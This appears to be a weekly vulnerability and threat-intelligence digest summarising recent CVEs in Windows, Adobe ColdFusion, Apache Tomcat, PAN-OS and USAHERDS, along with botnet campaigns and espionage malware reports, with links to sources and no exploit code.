This week, a critical vulnerability in Acclaim Systems' USAHERDS, involving hard-coded credentials, was added to the CISA KEV catalog. Proof-of-concept exploits have emerged for high-severity vulnerabilities in Microsoft Windows and Apache Tomcat. Adobe also released important updates for ColdFusion 2023 and 2021, addressing a flaw that could allow arbitrary file reading. These updates stress the importance of immediate patching to prevent exploitation.

Botnet activity is on the rise, with Zerobot targeting Tenda WiFi routers and Andoryu exploiting vulnerabilities in GitLab. IoT Reaper and AndroxGh0St continue attacking Cisco routers and PHP Unit, while veteran botnets like Mirai and Tsunami focus on an eight-year-old flaw in the Eir D1000 modem, underscoring the dangers of outdated infrastructure.

Additionally, Northwave discovered LITTLELAMB.WOOLTEA, a backdoor malware, during an active attack on a Palo Alto Networks firewall. Kaspersky also reported that the Cloud Atlas group uses sophisticated phishing campaigns to exploit Microsoft Office vulnerabilities in their cyber espionage efforts.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-30085

A high-severity elevation of privilege vulnerability (CVSS 7.8) has been identified in the Windows Cloud Files Mini Filter Driver, specifically affecting Windows 11 23H2 installations. Proof-of-concept (PoC) code for the vulnerability is available, increasing the urgency for remediation. Microsoft has addressed this issue in the June 2024 Patch Tuesday updates, and users are strongly advised to apply the patch immediately to secure their systems against potential exploitation.

CVE-2024-53961

A high-severity path traversal vulnerability (CVSS 7.4) has been discovered in Adobe ColdFusion, impacting both the 2023 and 2021 versions. This vulnerability could allow attackers to access and read arbitrary files on compromised servers, posing a significant risk to sensitive data. Users of affected versions are strongly encouraged to implement appropriate security updates to mitigate potential exploitation.

CVE-2024-50379

A critical Time-of-Check Time-of-Use (TOCTOU) race condition vulnerability, rated 9.8 on CVSS scale, has been identified in Apache Tomcat during JSP compilation. This flaw could enable remote code execution (RCE) on case-insensitive file systems under specific conditions. Exploitation requires the default servlet to have write access enabled, which is not the default configuration. With a proof-of-concept (PoC) available, this vulnerability poses a serious risk, and administrators are urged to review configurations and apply the necessary patches without delay.

CVE-2024-56337

A critical remote code execution vulnerability has been identified in Apache Tomcat, a widely used open-source web server and servlet container for deploying Java-based applications. Assigned a CVSS score of 9.0, this flaw stems from an incomplete mitigation of CVE-2024-50379. The vulnerability primarily affects systems with case-insensitive file systems where the default servlet's write functionality is enabled. Apache addressed this issue with multiple patches being released, emphasizing the importance of applying updates to mitigate potential risks.

CVE-2024-9474

Palo Alto Networks PAN-OS software is impacted by an OS command injection vulnerability, which enables administrators with access to the management web interface to escalate privileges and perform root-level actions on the firewall. Rated with a CVSS score of 7.2 (High), this flaw highlights the need for immediate remediation and stringent access policies.

CVE-2021-44207

A high-severity vulnerability (CVSS Score 8.1) has been identified in Acclaim Systems' USAHERDS, stemming from the use of hard-coded credentials. This flaw could allow attackers to execute arbitrary code on vulnerable servers. The issue affects USAHERDS versions 7.4.0.1 and earlier, posing a significant risk to systems running these versions. Recognizing its critical nature, the vulnerability has been added to the CISA KEV catalog, emphasizing the need for immediate remediation.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.

CVE-2024-9474

During a forensic investigation, Northwave researchers uncovered an active attack targeting a Palo Alto Networks firewall. Detailed analysis of the compromised device revealed the presence of a novel, stealthy, and sophisticated backdoor, which has been linked to the LITTLELAMB.WOOLTEA malware.

CVE-2018-0802

Kaspersky reports that the Cloud Atlas cyber espionage group employs a sophisticated infection chain initiated through phishing emails containing malicious documents. These documents exploit a vulnerability in Microsoft Office's formula editor (CVE-2018-0802) to launch their attacks.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/12/23/cisa-adds-one-known-exploited-vulnerability-catalog
2. https://securelist.com/cloud-atlas-attacks-with-new-backdoor-vbcloud/115103/  
3. https://northwave-cybersecurity.com/hubfs/LITTLELAMB%20WOOLTEA%20technical%20writeup%20Schrijver%20and%20Oudenaarden.pdf  
4. https://medium.com/@patelvidhi4288/deep-dive-poc-of-cve-2024-50379-exploit-tomcat-vulnerability-9-8-severity-776cfcfcf3ed  
5. https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/cve-2024-50379-tomcat-remote-code-execution  
6. https://securityonline.info/poc-exploit-released-for-cve-2024-30085-windows-elevation-of-privilege-vulnerability/